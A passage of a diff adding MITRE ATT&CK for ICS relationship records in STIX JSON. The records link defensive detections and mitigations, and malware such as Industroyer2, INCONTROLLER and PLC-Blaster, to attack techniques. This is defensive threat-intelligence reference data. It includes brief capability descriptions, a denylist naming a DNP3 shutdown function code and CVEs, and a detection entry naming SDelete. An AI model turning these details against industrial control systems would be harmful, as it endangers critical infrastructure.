observable in device application logs. Monitor for unexpected device restarts or shutdowns.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--461e81a2-c7ad-499e-908d-05ef2f7bd9cd", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.073Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6aa080d0-6e25-46e5-91d8-4af11f01ceef", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T18:41:05.273Z", + "description": "Monitor network data for uncommon data flows. 
Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6a5922e1-e282-464d-9e71-ce2c2ed44908", + "created": "2023-03-30T19:25:53.572Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Industroyer2 Mandiant April 2022", + "description": "Daniel Kapellmann Zafra, Raymond Leong, Chris Sistrunk, Ken Proska, Corey Hildebrandt, Keith Lunden, Nathan Brubaker. (2022, April 25). INDUSTROYER.V2: Old Malware Learns New Tricks. Retrieved March 30, 2023.", + "url": "https://www.mandiant.com/resources/blog/industroyer-v2-old-malware-new-tricks" + }, + { + "source_name": "Industroyer2 Forescout July 2022", + "description": "Forescout. (2022, July 14). Industroyer2 and INCONTROLLER In-depth Technical Analysis of the Most Recent ICS-specific Malware. 
Retrieved March 30, 2023.", + "url": "https://www.forescout.com/resources/industroyer2-and-incontroller-report/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-04-06T22:10:36.267Z", + "description": "[Industroyer2](https://attack.mitre.org/software/S1072) is capable of sending command messages from the compromised device to target remote stations to open data channels, retrieve the location and values of Information Object Addresses (IOAs), and modify the IO state values through Select Before Operate I/O, Select/Execute, and Invert Default State operations.(Citation: Industroyer2 Mandiant April 2022)(Citation: Industroyer2 Forescout July 2022)", + "relationship_type": "uses", + "source_ref": "malware--6a0d0ea9-b2c4-43fe-a552-ac41a3009dc5", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--74ec9ce5-3155-488c-ae56-570c47a1d207", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2021-04-13T12:45:26.506Z", + "modified": "2022-05-06T17:47:24.194Z", + "relationship_type": "mitigates", + "description": "ICS environments typically have more statically defined devices, therefore minimize the use of both IT discovery protocols (e.g., DHCP, LLDP) and discovery functions in automation protocols. (Citation: D. Parsons and D. Wylie September 2019) (Citation: Colin Gray) Examples of automation protocols with discovery capabilities include OPC UA Device Discovery (Citation: Josh Rinaldi April 2016), BACnet (Citation: Aditya K Sood July 2019), and Ethernet/IP. 
(Citation: Langner November 2018)\n", + "source_ref": "course-of-action--52c7a1a9-3a78-4528-a44f-cd7b0fa3541a", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "external_references": [ + { + "source_name": "D. Parsons and D. Wylie September 2019", + "description": "D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 ", + "url": "https://www.csiac.org/journal-article/practical-industrial-control-system-ics-cybersecurity-it-and-ot-have-converged-discover-and-defend-your-assets/" + }, + { + "source_name": "Colin Gray", + "description": "Colin Gray D. Parsons and D. Wylie 2019, September Practical Industrial Control System (ICS) Cybersecurity: IT and OT Have Converged Discover and Defend Your Assets Retrieved. 2020/09/25 How SDN Can Improve Cybersecurity in OT Networks Retrieved. 2020/09/25 ", + "url": "https://cdn.selinc.com/assets/Literature/Publications/Technical%20Papers/6891_HowSDN_CG_20180720_Web2.pdf?v=20190312-231901" + }, + { + "source_name": "Josh Rinaldi April 2016", + "description": "Josh Rinaldi 2016, April Still a Thrill: OPC UA Device Discovery Retrieved. 2020/09/25 ", + "url": "https://www.rtautomation.com/rtas-blog/still-a-thrill-opc-ua-device-discovery/" + }, + { + "source_name": "Aditya K Sood July 2019", + "description": "Aditya K Sood 2019, July Discovering and fingerprinting BACnet devices Retrieved. 2020/09/25 ", + "url": "https://www.helpnetsecurity.com/2019/07/10/bacnet-devices/" + }, + { + "source_name": "Langner November 2018", + "description": "Langner 2018, November Why Ethernet/IP changes the OT asset discovery game Retrieved. 
2020/09/25 ", + "url": "https://www.langner.com/2018/11/why-ethernet-ip-changes-the-ot-asset-discovery-game/" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b628d878-4f35-4580-8d42-26984d13821e", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.143Z", + "relationship_type": "mitigates", + "description": "Protocols used for control functions should provide authenticity through MAC functions or digital signatures. If not, utilize bump-in-the-wire devices or VPNs to enforce communication authenticity between devices that are not capable of supporting this (e.g., legacy controllers, RTUs).\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--68d30c45-766f-48b6-9405-0c969243332b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.214Z", + "relationship_type": "mitigates", + "description": "All devices or systems changes, including all administrative functions, should require authentication. 
Consider using access management technologies to enforce authorization on all management interface access attempts, especially when the device does not inherently provide strong authentication and authorization functions.\n", + "source_ref": "course-of-action--3992ce42-43e9-4bea-b8db-a102ec3ec1e3", + "target_ref": "attack-pattern--b9160e77-ea9e-4ba9-b1c8-53a3c466b13d", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--2e377016-bb23-481e-b72b-a2ace8c72eb7", + "created": "2022-05-11T16:22:58.803Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T15:10:53.087Z", + "description": "Monitor application logs for changes to settings and other events associated with network protocols that may be used to block communications.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--1c478716-71d9-46a4-9a53-fa5d576adb60", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--881ef4ba-a480-44de-8ab6-be2cdc87dcce", + "created": "2022-09-27T15:25:50.596Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:49:19.854Z", + "description": "Use verification of distributed binaries through hash checking or other integrity checking mechanisms. 
Scan downloads for malicious signatures.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--639e87f3-acb6-448a-9645-258f20da4bc5", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--0d540b53-6a5d-4f56-9dee-47707443b149", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-30T16:00:14.208Z", + "description": "Monitor ICS automation network protocols for functions related to reading an operational process state (e.g., “Read” function codes in protocols like DNP3 or Modbus). In some cases, there may be multiple ways to monitor an operational process’ state, one of which is typically used in the operational environment. 
Monitor for the operating mode being checked in unexpected ways.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--2d0d40ad-22fa-4cc8-b264-072557e1364b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ca768c2a-0f14-471c-90a5-bce649e88d51", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.105Z", + "relationship_type": "mitigates", + "description": "Application denylists can be used to block automation protocol functions used to initiate device shutdowns or restarts, such as DNP3's 0x0D function code, or vulnerabilities that can be used to trigger device shutdowns (e.g., CVE-2014-9195, CVE-2015-5374).\n", + "source_ref": "course-of-action--11f242bc-3121-438c-84b2-5cbd46a4bb17", + "target_ref": "attack-pattern--25dfc8ad-bd73-4dfd-84a9-3c3d383f76e9", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--35cf6922-d48f-42ea-b7f5-f0258892bd52", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-21T16:43:32.737Z", + "description": "Network segmentation can be used to isolate infrastructure components that do not require broad network access. 
This may mitigate, or at least alleviate, the scope of AiTM activity.\n", + "relationship_type": "mitigates", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--fcd3fdbf-4909-48ab-85c4-ce4b34172eb0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.106Z", + "relationship_type": "mitigates", + "description": "Restrict browsers to limit the capabilities of malicious ads and Javascript.\n", + "source_ref": "course-of-action--143b4398-3222-480a-b6a4-e131bc2d3144", + "target_ref": "attack-pattern--7830cfcf-b268-4ac0-a69e-73c6affbae9a", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--064dfd6f-db5d-48e8-b350-9dd47a270911", + "created": "2022-09-28T20:22:09.916Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. 
Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T15:16:59.156Z", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) can remotely read the OCP UA structure from devices.(Citation: CISA-AA22-103A) ", + "relationship_type": "uses", + "source_ref": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "target_ref": "attack-pattern--25852363-5968-4673-b81d-341d5ed90bd1", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--b0f137d8-3c56-4f6c-9d59-1ec231d61391", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:43:36.467Z", + "description": "Use deep packet inspection to look for artifacts of common exploit traffic, such as known payloads.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--32632a95-6856-47b9-9ab7-fea5cd7dce00", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--12a6c5bc-c685-4249-b8c6-e6d49aa2b9ed", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.077Z", + "relationship_type": "mitigates", + "description": "Protocols used 
for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--55f3dd59-08be-4e23-a680-b6db7850b399", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:59:50.879Z", + "description": "Monitor for newly executed processes of binaries that could be involved in data destruction activity, such as SDelete.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--493832d9-cea6-4b63-abe7-9a65a6473675", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6d822f86-5793-403a-b176-5d533f6b81b3", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Daavid Hentunen, Antti Tikkanen June 2014", + "description": "Daavid Hentunen, Antti Tikkanen 2014, June 23 Havex Hunts For ICS/SCADA Systems Retrieved. 
2019/04/01 ", + "url": "https://www.f-secure.com/weblog/archives/00002718.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:19:43.236Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) RAT is distributed through trojanized installers planted on compromised vendor sites. (Citation: Daavid Hentunen, Antti Tikkanen June 2014)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--5e0f75da-e108-4688-a6de-a4f07cc2cbe3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d7ea83fa-87c7-4d36-96d5-aee554504040", + "created": "2017-05-31T21:33:27.074Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Marc-Etienne M.Lveill October 2017", + "description": "Marc-Etienne M.Lveill 2017, October 24 Bad Rabbit: NotPetya is back with improved ransomware Retrieved. 2019/10/27 ", + "url": "https://www.welivesecurity.com/2017/10/24/bad-rabbit-not-petya-back/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:31:02.075Z", + "description": "Several transportation organizations in Ukraine have suffered from being infected by [Bad Rabbit](https://attack.mitre.org/software/S0606), resulting in some computers becoming encrypted, according to media reports. 
(Citation: Marc-Etienne M.Lveill October 2017)", + "relationship_type": "uses", + "source_ref": "malware--2eaa5319-5e1e-4dd7-bbc4-566fced3964a", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--7c329018-b591-42c4-8806-4d02ccd47476", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:55:36.262Z", + "description": "Monitor executed commands and arguments for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--8b136d10-1fd7-4cd4-a3a7-b648b23adc92", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:32:18.214Z", + "description": "Monitor for changes made to firmware for unexpected modifications to settings and/or data that may be used by rootkits to hide the presence of programs, files, network connections, services, drivers, and other system components. 
Asset management systems should be consulted to understand known-good firmware versions and configurations.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--b9d031bb-d150-4fc6-8025-688201bf3ffd", + "target_ref": "attack-pattern--3b6b9246-43f8-4c69-ad7a-2b11cfe0a0d9", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d90aeeb6-3686-483a-8403-6514ecfe1a50", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "ICS-CERT August 2018", + "description": "ICS-CERT 2018, August 22 Advisory (ICSA-14-178-01) Retrieved. 2019/04/01 ", + "url": "https://ics-cert.us-cert.gov/advisories/ICSA-14-178-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:23:33.379Z", + "description": "The [Backdoor.Oldrea](https://attack.mitre.org/software/S0093) payload has caused multiple common OPC platforms to intermittently crash. This could cause a denial of service effect on applications reliant on OPC communications. 
(Citation: ICS-CERT August 2018)", + "relationship_type": "uses", + "source_ref": "malware--083bb47b-02c8-4423-81a2-f9ef58572974", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--2c8dd182-e0a1-469d-aa65-7a1f734d9b46", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.071Z", + "relationship_type": "mitigates", + "description": "Provide an alternative method for sending critical report messages to operators, this could include using radio/cell communication to obtain messages from field technicians that can locally obtain telemetry and status data.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--3f1f4ccb-9be2-4ff8-8f69-dd972221169b", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--76b8bbce-1c65-4337-a4d7-320c594dc29e", + "created": "2022-05-11T16:22:58.805Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:36:51.486Z", + "description": "Monitor for network traffic originating from unknown/unexpected hosts. Local network traffic metadata (such as source MAC addressing) as well as usage of network management protocols such as DHCP may be helpful in identifying hardware. 
For added context on adversary procedures and background see [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) and applicable sub-techniques.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--a7f22107-02e5-4982-9067-6625d4a1765a", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--a7a4b080-e4a6-4c46-b2c7-84119df76393", + "created": "2022-09-26T14:43:24.136Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Elastic - Koadiac Detection with EQL", + "description": "Stepanic, D.. (2020, January 13). Embracing offensive tooling: Building detections against Koadic using EQL. Retrieved November 30, 2020.", + "url": "https://www.elastic.co/blog/embracing-offensive-tooling-building-detections-against-koadic-using-eql" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:49:34.799Z", + "description": "Monitor for newly executed processes that can be used to discover remote systems, such as ping.exe and tracert.exe, especially when executed in quick succession.(Citation: Elastic - Koadiac Detection with EQL) Consider monitoring for new processes engaging in scanning activity or connecting to multiple systems by correlating process creation network data.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3d20385b-24ef-40e1-9f56-f39750379077", + "target_ref": "attack-pattern--2fedbe69-581f-447d-8a78-32ee7db939a9", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": 
"identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--cb4d802e-df5b-4017-81dd-47f65fff23a3", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.219Z", + "relationship_type": "mitigates", + "description": "Encrypt any operational data with strong confidentiality requirements, including organizational trade-secrets, recipes, and other intellectual property (IP).\n", + "source_ref": "course-of-action--9f99fcfd-772e-4e63-9d39-e45612e546dc", + "target_ref": "attack-pattern--b7e13ee8-182c-4f19-92a4-a88d7d855d54", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--6902da63-3b59-46f3-99e0-6008dd47ab70", + "created": "2022-09-27T15:33:16.221Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:38:13.560Z", + "description": "Monitor executed commands and arguments related to services specifically designed to accept remote graphical connections, such as RDP and VNC. 
[Remote Services](https://attack.mitre.org/techniques/T0886) and [Valid Accounts](https://attack.mitre.org/techniques/T0859) may be used to access a host’s GUI.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0", + "target_ref": "attack-pattern--b0628bfc-5376-4a38-9182-f324501cb4cf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--6fa3aee4-2a29-4c0f-9e61-1f7df5eccc00", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke March 2016", + "description": "Spenneberg, Ralf, Maik Brggemann, and Hendrik Schwartke 2016, March 31 Plc-blaster: A worm living solely in the plc. Retrieved. 2017/09/19 ", + "url": "https://www.blackhat.com/docs/asia-16/materials/asia-16-Spenneberg-PLC-Blaster-A-Worm-Living-Solely-In-The-PLC-wp.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:01:38.884Z", + "description": "[PLC-Blaster](https://attack.mitre.org/software/S1006) may manipulate any outputs of the PLC. Using the POU POKE any value within the process image may be modified. 
